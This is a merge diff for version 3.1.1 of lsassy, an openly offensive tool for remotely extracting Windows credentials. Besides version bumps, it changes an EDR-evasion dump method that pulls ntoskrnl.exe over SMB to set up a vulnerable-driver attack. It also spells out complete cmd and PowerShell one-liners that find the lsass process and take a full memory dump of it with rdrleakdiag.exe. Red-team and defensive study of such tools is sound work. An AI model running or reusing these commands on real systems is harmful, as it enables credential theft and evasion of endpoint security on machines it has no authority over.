Merge pull request #66 from Hackndo/3.1.1

3.1.1

README.md

@@ -1,6 +1,6 @@
 # lsassy
 
-[![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=3.1.0&x2=0)](https://pypi.org/project/lsassy/)
+[![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=3.1.1&x2=0)](https://pypi.org/project/lsassy/)
 [![PyPI Statistics](https://img.shields.io/pypi/dm/lsassy.svg)](https://pypistats.org/packages/lsassy)
 [![Tests](https://github.com/hackndo/lsassy/workflows/Tests/badge.svg)](https://github.com/hackndo/lsassy/actions?workflow=Tests)
 [![Twitter](https://img.shields.io/twitter/follow/hackanddo?label=HackAndDo&style=social)](https://twitter.com/intent/follow?screen_name=hackanddo)

lsassy/__init__.py

@@ -1 +1 @@
-__version__ = '3.1.0'
+__version__ = '3.1.1'

lsassy/dumpmethod/edrsandblast.py

@@ -4,6 +4,8 @@
 
 import logging
 import os
+import random
+import string
 import subprocess
 
 from lsassy.dumpmethod import IDumpMethod, Dependency
@@ -16,20 +18,22 @@ def __init__(self, session, timeout):
         self.RTCore64 = Dependency("RTCore64", "RTCore64.sys")
         self.ntoskrnl = Dependency("ntoskrnl", "NtoskrnlOffsets.csv")
 
+        self.tmp_ntoskrnl = "lsassy_" + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32)) + ".exe"
+
     def prepare(self, options):
-        with open('/tmp/n.exe', 'wb') as p:
+        with open('/tmp/{}'.format(self.tmp_ntoskrnl), 'wb') as p:
             try:
                 self._session.smb_session.getFile("C$", "\\Windows\\System32\\ntoskrnl.exe", p.write)
-                logging.success("ntoskrnl.exe downloaded to /tmp/n.exe")
+                logging.success("ntoskrnl.exe downloaded to /tmp/{}".format(self.tmp_ntoskrnl))
             except Exception as e:
                 logging.error("ntoskrnl.exe download error", exc_info=True)
                 return None
-        self.ntoskrnl.content = self.get_offsets("/tmp/n.exe")
+        self.ntoskrnl.content = self.get_offsets("/tmp/{}".format(self.tmp_ntoskrnl))
 
         if self.ntoskrnl.content is not None:
             logging.success("ntoskrnl offsets extracted")
             logging.debug(self.ntoskrnl.content.split("\n")[1])
-        os.remove('/tmp/n.exe')
+        os.remove('/tmp/{}'.format(self.tmp_ntoskrnl))
 
         return self.prepare_dependencies(options, [self.edrsandblast, self.RTCore64, self.ntoskrnl])
 

lsassy/dumpmethod/rdrleakdiag.py

@@ -2,13 +2,20 @@
 
 
 class DumpMethod(IDumpMethod):
+    def __init__(self, session, timeout):
+        super().__init__(session, timeout)
+        self.waiting_time = 5
+
+    def prepare(self, options):
+        self.waiting_time = options.get("rdrleakdiag_wait", self.waiting_time)
+        return True
 
     def get_commands(self):
-        cmd_command = """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rdrleakdiag.exe -p %J -enable & for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rdrleakdiag.exe -p %J -o {} -fullmemdmp -snap & ping 127.0.0.1 -n 5 & for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do MOVE {}minidump_%J.dmp {}{} & for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do del {}results_%J.hlk""".format(
-            self.dump_path, self.dump_path, self.dump_path, self.dump_name, self.dump_path
+        cmd_command = """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rdrleakdiag.exe -p %J -enable & for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rdrleakdiag.exe -p %J -o {} -fullmemdmp -snap & ping 127.0.0.1 -n {} & for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do MOVE {}minidump_%J.dmp {}{} & for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do del {}results_%J.hlk""".format(
+            self.dump_path, self.waiting_time, self.dump_path, self.dump_path, self.dump_name, self.dump_path
         )
-        pwsh_command = """rdrleakdiag.exe -p (Get-Process lsass).Id -enable;rdrleakdiag.exe -p (Get-Process lsass).Id -o {} -fullmemdmp -snap;Start-Sleep 5;Move-Item {}minidump_$((Get-Process lsass).Id).dmp {}{};Remove-Item {}results_$((Get-Process lsass).Id).hlk""".format(
-            self.dump_path, self.dump_path, self.dump_path, self.dump_name, self.dump_path
+        pwsh_command = """rdrleakdiag.exe -p (Get-Process lsass).Id -enable;rdrleakdiag.exe -p (Get-Process lsass).Id -o {} -fullmemdmp -snap;Start-Sleep {};Move-Item {}minidump_$((Get-Process lsass).Id).dmp {}{};Remove-Item {}results_$((Get-Process lsass).Id).hlk""".format(
+            self.dump_path, self.waiting_time, self.dump_path, self.dump_path, self.dump_name, self.dump_path
         )
         return {
             "cmd": cmd_command,

pyproject.toml

@@ -1,6 +1,6 @@
 [tool.poetry]
 name = "lsassy"
-version = "3.1.0"
+version = "3.1.1"
 description = "Tool to remotely extract credentials"
 readme = "README.md"
 homepage = "https://github.com/hackndo/lsassy"

setup.py

@@ -13,7 +13,7 @@
 
 setup(
     name="lsassy",
-    version="3.1.0",
+    version="3.1.1",
     author="Pixis",
     author_email="[email protected]",
     description="Python library to extract credentials from lsass remotely",

tests/test_lsassy.py

@@ -2,4 +2,4 @@
 
 
 def test_version():
-    assert __version__ == '3.1.0'
+    assert __version__ == '3.1.1'